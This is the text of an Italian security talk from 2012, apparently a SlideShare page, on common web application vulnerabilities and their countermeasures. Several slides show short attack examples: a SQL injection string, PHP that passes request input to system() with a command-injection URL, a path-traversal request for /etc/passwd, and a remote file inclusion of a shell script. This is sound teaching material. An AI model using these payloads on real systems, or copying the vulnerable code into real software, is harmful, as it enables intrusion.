Odio le mie applicazioni web e chi le ha scritte

1,085 views
1,036 views

Published on

Published in: Technology
0 Comments
2 Likes
Statistics
Notes
  • Be the first to comment

No Downloads
Views
Total views
1,085
On SlideShare
0
From Embeds
0
Number of Embeds
131
Actions
Shares
0
Downloads
10
Comments
0
Likes
2
Embeds 0
No embeds

No notes for slide

Odio le mie applicazioni web e chi le ha scritte

  1. 1. Odio le mie webapp. Ma soprattutto chi le ha scritte!Roma, Ottobre 2012 Alessio L.R. Pennasilico mayhem@alba.st
  2. 2. Alessio L.R. Pennasilico Security Evangelist @ Committed: AIP Associazione Informatici Professionisti, CLUSIT AIPSI Associazione Italiana Professionisti Sicurezza Informatica Italian Linux Society, Sikurezza.org, AIP/OPSI Hacker’s Profiling Project, CrISTAL !Alessio L.R. Pennasilico 2
  3. 3. http://www.alba.st/ Le applicazoni web
  4. 4. Web è bello! Lavoro ovunque, comunque, a qualsiasi ora, con qualsiasi device, accedendo a tutte le informazioni che mi servono.Alessio L.R. Pennasilico 4
  5. 5. Dove stava scritto sicurezza? :(Alessio L.R. Pennasilico 5
  6. 6. Cosa si trova in girohttp://www.alba.st/
  7. 7. XSS Affligge siti web con scarso controllo di variabili derivate da input dellutente. Permette di inserire codice a livello browser al fine di modificare il codice sorgente della pagina web visitata. In questo modo un cracker può tentare di recuperare dati sensibili quali cookies.Alessio L.R. Pennasilico 7
  8. 8. SQL Injection Sfrutta la non normalizzazione dell’input a‘ OR ‘1’=’1Alessio L.R. Pennasilico 8
  9. 9. Funzioni exec() - system() - eval() <?php system("echo  ".$_REQUEST[parametro]); ?> Se la usassi così? http://host/index.php?parametro=;touch  /tmp/hackedAlessio L.R. Pennasilico 9
  10. 10. Local File Inclusion <?php include(/var/www/articoli/  .  $_REQUEST[articolo]); ?> Lutilizzo normale sarebbe: http://host/index.php?articolo=sport.html ma posso usarlo così: http://host/index.php?articolo=../../../etc/passwdAlessio L.R. Pennasilico 10
  11. 11. Remote File Inclusion <?php  include($_GET[page]); ?> Se la usassi così? http://host/index.php?page=http://xxx/shell.phpAlessio L.R. Pennasilico 11
  12. 12. Esempi reali IIS Webservice user e pass hardcodedAlessio L.R. Pennasilico 12
  13. 13. Esempi reali e-commerce javascript dati letti dal server ed inviati dal client prezzi inclusiAlessio L.R. Pennasilico 13
  14. 14. Esempi reali Quanto sono comodi i tab?Alessio L.R. Pennasilico 14
  15. 15. http://www.alba.st/ Le contromisure
  16. 16. Filtrare a monte UTM Firewall IDS / IPS DLPAlessio L.R. Pennasilico 16
  17. 17. Software layer Reverse Proxy mod_*Alessio L.R. Pennasilico 17
  18. 18. Configurare bene il sistema chroot privilege drop permessi mod_*Alessio L.R. Pennasilico 18
  19. 19. Scrivere bene le app input validation controlli server sideAlessio L.R. Pennasilico 19
  20. 20. Standard e check OWASP - Code review OSSTMM - PenTest Repetita iuvantAlessio L.R. Pennasilico 20
  21. 21. Mitigare... Eliminare le classiche cause di vulnerabilità es: le password!Alessio L.R. Pennasilico 21
  22. 22. Spiegare Molti attacchi si possono evitare con la user awarnessAlessio L.R. Pennasilico 22
  23. 23. Risolvere il problemahttp://www.alba.st/
  24. 24. Conclusioni Senza scrivere buon codice tutto il resto è un palliativo!Alessio L.R. Pennasilico 24
  25. 25. Conclusioni Preoccupatevi delle persone, più della tecnologia!Alessio L.R. Pennasilico 25
  26. 26. Grazie dell’attenzione! These slides are written by Alessio L.R. Pennasilico aka mayhem. They are subjected to Creative Commons Attribution- ShareAlike-2.5 version; you can copy, modify, or sell them. “Please” cite your source and use the same licence :)Roma, Ottobre 2012 Alessio L.R. Pennasilico mayhem@alba.st

×